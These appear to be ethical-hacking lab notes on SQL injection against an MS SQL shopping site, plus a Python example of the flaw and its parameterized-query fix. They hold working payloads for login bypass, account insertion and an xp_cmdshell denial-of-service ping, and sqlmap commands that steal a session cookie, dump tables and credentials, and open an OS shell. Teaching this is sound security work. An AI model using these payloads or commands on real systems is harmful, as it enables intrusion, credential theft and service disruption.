--- It is a basic attack used to gain unauthorized access to a database or to retrieve information directly from the database.
--- It is a flaw or defect in the web application, not a database or server issue.
--- Understanding when and how a web application connects to a database server in order to access data
--- Extracting basic SQL Injection flaws and vulnerabilities
--- Testing web application for Blind SQL Injection vulnerabilities
--- Scanning web servers and analyzing the reports
--- Securing information in web applications and web servers
1. SQL Injection Attacks on MS SQL Database
-- Log on without valid credentials
-- Test for SQL Injection
-- Create your own database
-- Directory listing
-- Enforce Denial of Service attacks
---> Open any browser in Windows, go to the shopping website and open the login page
---> Try to log in as an unauthorized user by entering the following query and clicking Login
username = "or""="
password = "or""="
---> To create a user without using the register option, type the following query in the username field
blah';insert into login values('mitesh','mitesh123'); --
---> To perform a Denial of Service attack, type the following query in the username field
blah';exec master..xp_cmdshell'ping [moviewebsite] -l 65000 -t'; --
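Why the account-creation input above works, and why a parameterized query stops it, shown as an added example that is not part of the original notes. An in-memory SQLite database stands in for MS SQL Server, `executescript` stands in for a driver that allows stacked statements, and the function names and the seeded row are assumptions made for the example.

```python
import sqlite3

# Constructed sample data: a two-column login table like the one the notes target.
# SQLite (in memory) stands in for MS SQL Server so the example runs offline.
PAYLOAD = "blah';insert into login values('mitesh','mitesh123'); --"  # input from the notes


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (username TEXT, password TEXT)")
    conn.execute("INSERT INTO login VALUES ('alice', 'constructed-sample')")
    conn.commit()
    return conn


def account_count(conn):
    return conn.execute("SELECT COUNT(*) FROM login").fetchone()[0]


def lookup_vulnerable(conn, username):
    # Flaw: user input is concatenated into the SQL text, so a quote ends the
    # string literal and everything after it is parsed as SQL.
    sql = "SELECT password FROM login WHERE username = '" + username + "';"
    # executescript() accepts several statements per call, standing in for a
    # driver that allows stacked queries (an assumption of this example).
    conn.executescript(sql)
    return sql


def lookup_parameterized(conn, username, password):
    # Fix: the SQL text is constant and the values are bound separately,
    # so quotes, semicolons and comment markers stay inside the value.
    row = conn.execute(
        "SELECT 1 FROM login WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def demo():
    weak, fixed = new_db(), new_db()
    lookup_vulnerable(weak, PAYLOAD)                       # second statement runs
    logged_in = lookup_parameterized(fixed, PAYLOAD, PAYLOAD)  # treated as plain text
    return account_count(weak), account_count(fixed), logged_in


if __name__ == "__main__":
    print(demo())
```

The concatenated version ends up with a second account in the table, while the parameterized version leaves the table unchanged and rejects the login.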
2. Performing SQL Injection attack against MSSQL to extract Databases and WebShell using SQLMAP
--- Extract the MSSQL Database using SQLMAP
Tool : SQLMAP
---> Log in to the application and note down the URL in the address bar
---> Copy the cookie: open Inspect Element, switch to the Console and enter document.cookie
---> Open a terminal and type the following command
# sqlmap -u "URL of the website" --cookie="paste the copied cookie" --dbs --- This command enumerates the database information [Y Y N]
---> We found a database; now find the tables in that database
# sqlmap -u "URL of the website" --cookie="paste the copied cookie" -D [database name] --tables
---> Once an interesting table is found, find out its columns
# sqlmap -u "URL of the website" --cookie="paste the copied cookie" -D [database name] -T [table name] --columns
---> Now dump all the table contents
# sqlmap -u "URL of the website" --cookie="paste the copied cookie" -D [database name] -T [table name] --dump
---> We now have a username and password
---> Gain OS shell access to the machine
# sqlmap -u "URL of the website" --cookie="paste the copied cookie" --os-shell (Y)